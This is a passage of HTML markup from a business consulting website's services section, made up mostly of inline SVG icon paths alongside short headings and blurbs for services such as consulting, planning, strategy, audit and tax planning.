		<path d="M341.92,254.731c34.292-22.056,54.765-59.534,54.765-100.256V64.863c25.227-2.897,44.887-24.371,44.887-50.36V10    c0-5.522-4.478-10-10-10H80.429c-5.522,0-10,4.478-10,10v4.503c0,26.1,19.826,47.651,45.207,50.401v89.572    c0,40.722,20.473,78.2,54.765,100.257c0.466,0.3,0.702,0.726,0.702,1.268c0,0.542-0.236,0.968-0.702,1.269    c-34.292,22.056-54.765,59.534-54.765,100.256v89.272c-24.94,0.077-45.207,20.386-45.207,45.344V502c0,5.522,4.478,10,10,10    h351.143c5.522,0,10-4.478,10-10v-9.859c0-24.85-20.094-45.087-44.887-45.336v-89.28c0-40.722-20.473-78.2-54.765-100.257    c-0.466-0.3-0.702-0.726-0.702-1.268S341.454,255.032,341.92,254.731z M396.224,466.793c13.929,0,25.271,11.295,25.347,25.207    H90.429c0.076-13.912,11.418-25.207,25.348-25.207h9.839c0.01,0,0.019,0.002,0.028,0.002c0.011,0,0.023-0.002,0.034-0.002h261.007    H396.224z M168.265,446.793l87.888-43.633l87.673,43.633H168.265z M331.102,274.089c28.543,18.358,45.583,49.549,45.583,83.436    v83.282l-116.069-57.766c-2.803-1.396-6.099-1.396-8.901-0.005l-116.078,57.628v-83.14c0-33.887,17.04-65.077,45.583-83.435    c6.189-3.98,9.884-10.743,9.884-18.09s-3.694-14.109-9.884-18.089c-28.543-18.358-45.583-49.549-45.583-83.436V56.94    c0.099-0.564,0.16-1.141,0.16-1.733c0-5.522-4.478-10-10-10h-4.663c-15.055,0-27.613-10.89-30.211-25.207h330.156    c-2.598,14.317-15.156,25.207-30.212,25.207h-172.63c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h158.447v89.269    c0,33.887-17.04,65.077-45.583,83.435c-6.189,3.98-9.884,10.743-9.884,18.09C321.217,263.348,324.911,270.109,331.102,274.089z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M338.63,159.11h-60.178c-11.712,0-18.942,4.568-23.031,8.58c-5.659-5.049-13.826-8.58-25.07-8.58h-60.177    c-5.522,0-10,4.478-10,10c0,5.522,4.478,10,10,10h60.177c13.767,0,15.557,8.457,15.683,12.13c0,0.049,0.001,0.092,0.002,0.127    c0.133,5.433,4.576,9.756,9.995,9.756c0.041,0,0.083,0,0.124-0.001c5.475-0.066,9.878-4.523,9.878-9.999c0-0.07,0-0.14-0.001-0.21    c0.021-4.447,1.683-11.803,12.421-11.803h60.178c5.521,0,9.999-4.477,9.999-10C348.63,163.588,344.152,159.11,338.63,159.11z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Consulting</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="256" cy="164.02" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="252.36" cy="407.72" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Planning</a></h5>				<p>We’ve beven a strategy thought leader for nearly five decades</p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Strategy</a></h5>				<p>We’ve been a strategy tmhought leader for nearly five decades</p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="87.43" cy="406.69" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="470.4" cy="287.44" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Support</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled</p>			
        			<a href="#"class="link-details"> Explore More </a>
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Audit and Assurance</a></h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M317.5,25.324H195.706c-18.813,0-34.118,15.305-34.118,34.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10V59.441    c0-7.784,6.333-14.117,14.118-14.117H317.5c7.785,0,14.118,6.333,14.118,14.117v15.677c0,5.523,4.477,10,10,10s10-4.477,10-10    V59.441C351.618,40.628,336.313,25.324,317.5,25.324z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M463.178,106.118H48.822C21.901,106.118,0,128.019,0,154.94v88.801c0,4.433,2.919,8.337,7.171,9.592l6.093,1.797v209.488    c0,12.163,9.896,22.059,22.059,22.059h441.353c12.164,0,22.059-9.896,22.059-22.059V256.603l6.039-1.744    c4.279-1.236,7.226-5.153,7.226-9.607V154.94C512,128.019,490.099,106.118,463.178,106.118z M89.235,466.676H35.323    c-1.135,0-2.058-0.923-2.058-2.058v-53.912h28.76c15.004,0,27.21,12.207,27.21,27.21V466.676z M478.734,464.618    c0.001,1.135-0.922,2.058-2.058,2.058h-53.912v-28.76c0-15.004,12.207-27.21,27.21-27.21h28.76V464.618z M478.736,390.706h-0.001    h-28.76c-26.032,0-47.21,21.179-47.21,47.21v28.76h-293.53v-28.76c0-26.032-21.179-47.21-47.21-47.21h-28.76V261.029    L209.824,313.1v32.135c0,5.523,4.477,10,10,10h72.353c5.523,0,10-4.477,10-10v-31.868l176.559-50.988V390.706z M229.823,335.235    v-29.707c0-0.028,0-0.056,0-0.083V286.5h52.353v48.735H229.823z M492,237.731L302.176,292.55V276.5c0-5.523-4.477-10-10-10    h-72.353c-5.523,0-10,4.477-10,10v15.75L20,236.265V154.94c0-15.893,12.93-28.822,28.822-28.822h40.413v34.618    c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h289.912v34.618c0,5.523,4.477,10,10,10s10-4.477,10-10v-34.618h44.031    c15.893,0,28.822,12.93,28.822,28.822V237.731z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="409.15" cy="199.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="99.23" cy="199.32" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Gross Tax Planning</a></h5>				<p>Discover the emerging technologies most relevant to your strategy by working with our community.</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Marketing Research</a></h5>				<p>It is almost impossible to make strategic decisions without deep knowledge</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
